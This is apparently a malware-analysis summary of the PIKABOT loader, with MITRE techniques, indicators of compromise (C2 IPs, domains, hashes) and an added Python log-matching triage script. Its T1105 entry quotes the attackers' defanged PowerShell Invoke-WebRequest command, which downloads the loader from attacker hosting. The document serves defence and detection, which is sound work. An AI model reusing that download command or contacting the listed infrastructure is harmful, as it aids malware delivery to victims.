PIKABOT is a widely deployed loader used by attackers to distribute payloads such as Cobalt Strike or ransomware, with Elastic Security Labs reporting new campaigns and an updated loader featuring a new unpacking method and heavier obfuscation. The update signals a potentially evolving codebase that may break signatures and tooling, while highlighting a shift toward in-memory loading, runtime plaintext config, and anti-debugging measures. Hashtags: #PIKABOT #ElasticSecurityLabs #grepWinNP3 #gloverstech #entrevientos
Keypoints
- Fresh PIKABOT campaigns with substantial loader/core updates
- New unpacking technique that assembles base64-encoded chunks from the .data section
- Core changes include reduced obfuscation, in-line RC4, plaintext runtime config, and removal of AES in network traffic
- Loader stage 2 is decrypted and reflectively loaded into memory to avoid disk writes
- Anti-debugging and syscall-based techniques are employed to evade EDR and analysis
- Extensive initial collection of victim information, followed by covert C2 communication over HTTPS on non-standard ports
MITRE Techniques
- [T1059.001] PowerShell – Used to download and execute PIKABOT’s loader via a PowerShell command; “Below are the contents of the obfuscated JavaScript file, showing the next sequence to download and execute PIKABOT’s loader using PowerShell.”
- [T1105] Ingress Tool Transfer – The loader is fetched from remote infrastructure with a PowerShell web request; “powershell Invoke-WebRequest https://gloverstech[.]com/tJWz9/0.2343379541861872.dat -OutFile …”
- [T1036] Masquerading – Masquerading as a legitimate tool (grepWinNP3.exe) to appear authentic; “tampered with a legitimate search and replace tool called grepWinNP3.exe …”
- [T1055.012] Reflective Code Loading – Stage 2 payload is loaded reflectively into the running process, avoiding disk writes; “reflectively load the PE file within the confines of the currently executing process.”
- [T1082] System Information Discovery – Initial collection of victim machine information (username, computer name, processor, memory, etc.) for fingerprinting; “collecting victim machine information and placing the data into a custom structure…”
- [T1057] Process Discovery – Process information enumeration using CreateToolhelp32Snapshot/Process32FirstW/Process32NextW; “to retrieve process information”
- [T1071.001] Web Protocols – Network communication over HTTPS on non-traditional ports using a custom user-agent; “Network communication over HTTPS on non-traditional ports (2967, 2223, etc)”
Indicators of Compromise
- [SHA-256] 2f66fb872c9699e04e54e5eaef982784b393a5ea260129a1e2484dd273a5a88b – Opc.zip (Zip archive holding obfuscated JavaScript)
- [SHA-256] ca5fb5814ec62c8f04936740aabe2664b3c7d036203afbd8425cd67cf1f4b79d – grepWinNP3.exe (PIKABOT loader)
- [ipv4-addr] 139.84.237.229:2967 – PIKABOT C2 server
- [ipv4-addr] 158.220.80.167:2967 – PIKABOT C2 server
- [domain] gloverstech[.]com – Hosting infra for PIKABOT loader
- [domain] entrevientos.com[.]ar – Hosting infra for ZIP archive
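The C2 ports listed under T1071.001 and the network indicators above can be turned into a simple triage check. The following Python is an added example, not code from Elastic Security Labs' report; the `key=value` log format, the `refang`/`classify`/`scan` helper names and the set of "normal" TLS ports are assumptions, and the sample log lines are constructed.

```python
# Added example (not code from Elastic's report): match the report's network
# indicators and C2 ports against constructed proxy/firewall log lines.
def refang(ioc: str) -> str:
    """Turn a defanged indicator such as gloverstech[.]com into a hostname."""
    return ioc.replace("[.]", ".").lower().rstrip(".")

# Indicators copied from the IoC list above.
C2_ADDRS = {("139.84.237.229", 2967), ("158.220.80.167", 2967)}
LOADER_DOMAINS = {refang(d) for d in ("gloverstech[.]com", "entrevientos.com[.]ar")}
PIKABOT_PORTS = {2967, 2223}        # non-traditional HTTPS ports named in the report
STANDARD_TLS_PORTS = {443, 8443}    # assumption: TLS here is not suspicious by itself

def parse_line(line: str) -> dict:
    """Parse one 'key=value' log line; this log format is an assumption."""
    fields = dict(kv.split("=", 1) for kv in line.split() if "=" in kv)
    fields["dport"] = int(fields.get("dport", 0))
    return fields

def classify(line: str):
    """Return (line, reason) for a matching line, else None; most specific first."""
    f = parse_line(line)
    dst, dport, host = f.get("dst", ""), f["dport"], refang(f.get("host", ""))
    is_tls = f.get("proto") == "tls"
    if (dst, dport) in C2_ADDRS:
        return line, f"known PIKABOT C2 {dst}:{dport}"
    if host in LOADER_DOMAINS:
        return line, f"known PIKABOT hosting domain {host}"
    if is_tls and dport in PIKABOT_PORTS:
        return line, f"TLS to PIKABOT-style non-standard port {dport}"
    if is_tls and dport not in STANDARD_TLS_PORTS:
        return line, f"TLS to non-standard port {dport} (review)"  # low confidence
    return None

def scan(lines):
    """Run classify over an iterable of log lines and keep only the hits."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample lines using documentation-range addresses, not real traffic.
SAMPLE_LOG = [
    "src=10.0.0.5 dst=139.84.237.229 dport=2967 proto=tls",
    "src=10.0.0.5 dst=203.0.113.10 dport=443 proto=tls host=gloverstech.com",
    "src=10.0.0.7 dst=198.51.100.2 dport=2223 proto=tls",
    "src=10.0.0.8 dst=198.51.100.3 dport=443 proto=tls host=example.org",
    "src=10.0.0.9 dst=198.51.100.4 dport=8080 proto=http host=example.net",
    "src=10.0.0.9 dst=198.51.100.5 dport=9443 proto=tls",
]

if __name__ == "__main__":
    for _, reason in scan(SAMPLE_LOG):
        print(reason)
```

The last rule is deliberately broad: TLS on any unusual port is only a triage signal, so keep it separate from the exact-match indicators when tuning alert severity.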
Read more: https://www.elastic.co/security-labs/pikabot-i-choose-you